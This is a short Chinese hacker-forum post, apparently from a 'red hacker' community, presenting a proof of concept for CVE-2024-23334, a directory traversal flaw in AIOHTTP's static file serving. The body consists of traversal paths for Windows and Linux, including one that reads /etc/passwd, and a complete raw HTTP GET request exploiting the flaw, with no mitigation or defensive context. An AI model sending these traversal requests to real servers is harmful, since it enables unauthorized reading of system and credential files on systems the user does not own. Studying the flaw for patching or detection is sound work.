[联盟原创] CVE-2024-23334目录遍历

1388 0
Mr_Spider 2024-3-2 20:39:14 | 显示全部楼层 |阅读模式
[i=s] 本帖最后由 Mr_Spider 于 2024-3-2 20:50 编辑 [/i]

[xmd]AIOHTTP目录遍历
windows    /static/../D:\flag.txt
Linux   /static/../../../../etc/passwd [need to fuzz "../"]
POC:
```
GET /static/../../../../D:\\6666.txt HTTP/1.1
Host: 127.0.0.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Mr_Spider

版主

关注
  • 29
    主题
  • 2
    粉丝
  • 0
    关注
这家伙很懒,什么都没留下!

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2025 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行